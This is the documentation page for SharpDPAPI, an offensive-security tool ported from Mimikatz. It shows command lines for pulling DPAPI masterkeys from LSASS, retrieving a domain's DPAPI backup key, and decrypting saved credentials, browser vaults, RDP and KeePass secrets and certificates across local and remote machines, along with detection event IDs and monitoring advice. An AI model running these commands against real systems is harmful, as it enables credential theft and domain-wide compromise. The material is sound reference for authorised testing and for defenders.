Skip to main content
  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.20.0

What is SharpDPAPI?

SharpDPAPI is a C# port of DPAPI functionality from Mimikatz that enables the extraction and decryption of Windows Data Protection API (DPAPI) protected data. It operationalizes Benjamin Delpy’s work to fit offensive security workflows, allowing practitioners to decrypt credentials, certificates, and other sensitive data protected by DPAPI.
SharpDPAPI is a port of DPAPI functionality from @gentilkiwi’s Mimikatz project. The original logic and implementation credit belongs to Benjamin Delpy.

Understanding DPAPI

The Windows Data Protection API (DPAPI) is a cryptographic application programming interface that allows applications to protect sensitive data using encryption keys derived from user credentials or system secrets.

User DPAPI

Protects user-specific data using keys derived from user passwords

Machine DPAPI

Protects system-level data using keys derived from machine secrets

Domain Backup Key

Domain controllers maintain backup keys that can decrypt any domain user’s masterkeys

Masterkeys

Intermediate keys that protect actual data encryption keys

DPAPI Architecture

Key Capabilities

  • User Data Extraction
  • Machine Data Extraction
  • Domain Operations
  • Utilities
Decrypt User DPAPI Protected Data:
  • Credential Manager credentials
  • Windows Vault data (IE/Edge saved passwords)
  • RDP connection passwords (RDCMan.settings, .rdg files)
  • KeePass master keys
  • User certificates and private keys
  • PowerShell credential objects

Operational Usage

Pre-Domain Compromise

Before obtaining domain administrator privileges, SharpDPAPI can leverage:
Use Mimikatz sekurlsa::dpapi to extract :SHA1 masterkey mappings from LSASS memory for currently logged-in users.
# Extract masterkeys with Mimikatz
mimikatz# sekurlsa::dpapi

# Use with SharpDPAPI
SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1
If you have a user’s password, NTLM hash, or DPAPI prekey, use these directly:
# Using plaintext password
SharpDPAPI.exe credentials /password:Password123!

# Using NTLM hash
SharpDPAPI.exe credentials /ntlm:8846F7EAEE8FB117AD06BDD830B7586C

# Using DPAPI prekey (from sekurlsa::msv)
SharpDPAPI.exe credentials /credkey:abc123...
With local admin rights, use machine triage commands to decrypt system-level DPAPI data:
# Triage all machine DPAPI data
SharpDPAPI.exe machinetriage

Post-Domain Compromise

After obtaining domain admin privileges:
1

Retrieve Domain Backup Key

SharpDPAPI.exe backupkey /server:dc.domain.com /file:key.pvk
This key never changes and can decrypt masterkeys for any domain user.
2

Decrypt All User Masterkeys

SharpDPAPI.exe masterkeys /pvk:key.pvk
Returns :SHA1 mappings for all accessible masterkeys.
3

Triage All User Data

SharpDPAPI.exe triage /pvk:key.pvk
Automatically decrypts credentials, vaults, RDG files, and certificates for all users.
4

Remote System Triage

SharpDPAPI.exe credentials /pvk:key.pvk /server:target.domain.com
Triage DPAPI data on remote systems (requires admin access).

Command Categories

User Triage Commands

masterkeys

Decrypt and extract user masterkey files

credentials

Decrypt Windows Credential Manager credentials

vaults

Decrypt Windows Vault data (browser passwords)

rdg

Decrypt RDP connection passwords

keepass

Extract KeePass master key material

certificates

Decrypt user certificate private keys

triage

Run all user DPAPI extraction commands

ps

Decrypt PowerShell credential XML files

Machine Triage Commands

machinemasterkeys

Decrypt machine masterkey files using DPAPI_SYSTEM

machinecredentials

Decrypt system Credential Manager credentials

machinevaults

Decrypt system Vault data

machinetriage

Run all machine DPAPI extraction commands

Utility Commands

backupkey

Retrieve domain DPAPI backup key from DC

blob

Decrypt arbitrary DPAPI blobs

search

Search for DPAPI blobs in registry and files

sccm

Extract SCCM Network Access Account credentials

Common Arguments

  • Decryption Methods
  • Targeting
  • Output Options
Ways to Decrypt DPAPI Data:
ArgumentDescription
/pvk:BASE64...Use base64-encoded domain backup key
/pvk:key.pvkUse domain backup key file
/password:XDecrypt using plaintext password
/ntlm:XDecrypt using NTLM hash
/credkey:XUse DPAPI credkey (SHA1 from Mimikatz)
/rpcDecrypt by asking domain controller
{GUID}:SHA1 ...Use explicit masterkey mappings
/mkfile:FILELoad masterkey mappings from file
/unprotectUse CryptUnprotectData() (current user context)

Typical Workflows

# 1. Retrieve domain backup key
SharpDPAPI.exe backupkey /server:dc.domain.com

# 2. Triage all user DPAPI data on current system
SharpDPAPI.exe triage /pvk:HvG1sAA...

# 3. Triage remote systems
SharpDPAPI.exe credentials /pvk:HvG1sAA... /server:fileserver.domain.com
SharpDPAPI.exe vaults /pvk:HvG1sAA... /server:fileserver.domain.com

# 1. Use Mimikatz to extract user masterkeys
mimikatz# sekurlsa::dpapi

# 2. Triage user DPAPI data with masterkeys
SharpDPAPI.exe triage {GUID1}:SHA1 {GUID2}:SHA1

# 3. Triage machine DPAPI data
SharpDPAPI.exe machinetriage

# 1. Decrypt current user's RDG files (no elevation needed)
SharpDPAPI.exe rdg /unprotect

# 2. With user's password, decrypt their DPAPI data
SharpDPAPI.exe credentials /password:Password123!
SharpDPAPI.exe vaults /password:Password123!

# 1. Copy user's masterkey folder and DPAPI data to analysis machine

# 2. Decrypt masterkeys with known password
SharpDPAPI.exe masterkeys /target:C:\Evidence\Protect\S-1-5-21-... /password:Password123!

# 3. Decrypt credentials with masterkeys from offline folder
SharpDPAPI.exe credentials /target:C:\Evidence\Credentials /pvk:key.pvk

Detection Considerations

SharpDPAPI operations can be detected through multiple mechanisms. Use appropriate operational security measures.
  • Reading sensitive DPAPI masterkey files
  • Accessing LSASS for DPAPI_SYSTEM secret
  • Bulk reading of Credential Manager and Vault files
  • Token manipulation for SYSTEM elevation
  • SMB enumeration of user profiles on remote systems
  • MS-BKRP protocol usage for backup key retrieval
  • Unusual DC RPC calls (LsaRetrievePrivateData)
  • 4656/4663: Access to masterkey files
  • 4662: Domain backup key access on DC
  • 4624/4672: Privileged logon for remote triage
  • 4688: SharpDPAPI.exe process execution
  • Monitor access to %APPDATA%\Microsoft\Protect\ directories
  • Alert on MS-BKRP backup key retrieval
  • Restrict DPAPI_SYSTEM LSA secret access
  • Monitor for bulk Credential Manager file access
  • Implement conditional access and MFA where possible

Prerequisites

  • Visual Studio 2019 Community Edition or later
  • .NET Framework 3.5 (default target)
  • Can be retargeted to .NET 4.0 or 4.5
  • Windows operating system
  • .NET Framework installed on target
  • Appropriate access rights for target data
User Commands:
  • Standard user: Can decrypt own data with /unprotect
  • Any user: With valid credentials or masterkeys
Machine Commands:
  • Local Administrator: Required for DPAPI_SYSTEM access
  • SYSTEM context: For full machine triage
Domain Operations:
  • Domain Admin: For backup key retrieval
  • Local Admin: For remote system triage

Technical Background

DPAPI uses a multi-layer key derivation system:
  1. User Credentials → Derives User Masterkey
  2. User Masterkey → Decrypts DPAPI Blob
  3. DPAPI Blob → Contains Protected Data
The domain backup key can decrypt any domain user’s masterkeys, providing a domain-wide decryption capability.
CryptUnprotectData():
  • Windows API that automatically handles decryption
  • Only works in the context of the user who encrypted the data
  • Doesn’t require elevated privileges
  • Used with /unprotect flag
Manual Decryption:
  • Requires masterkeys or backup keys
  • Works across user contexts
  • Can decrypt other users’ data
  • Necessary for remote triage

Additional Resources

DPAPI Attack Guidance

Operational Guidance for Offensive User DPAPI Abuse

Credential Manager Internals

How Credential Manager and Vaults work with DPAPI

GitHub Repository

Official SharpDPAPI repository

Mimikatz Project

Original DPAPI implementation source

Next Steps

Compilation Guide

Build SharpDPAPI from source

User Commands

Start with user DPAPI triage

Machine Commands

Learn system-level DPAPI extraction

Domain Operations

Extract domain backup key

License

SharpDPAPI is licensed under the BSD 3-Clause license.
SharpDPAPI is a port of Mimikatz DPAPI functionality. All credit for the original implementation goes to Benjamin Delpy (@gentilkiwi).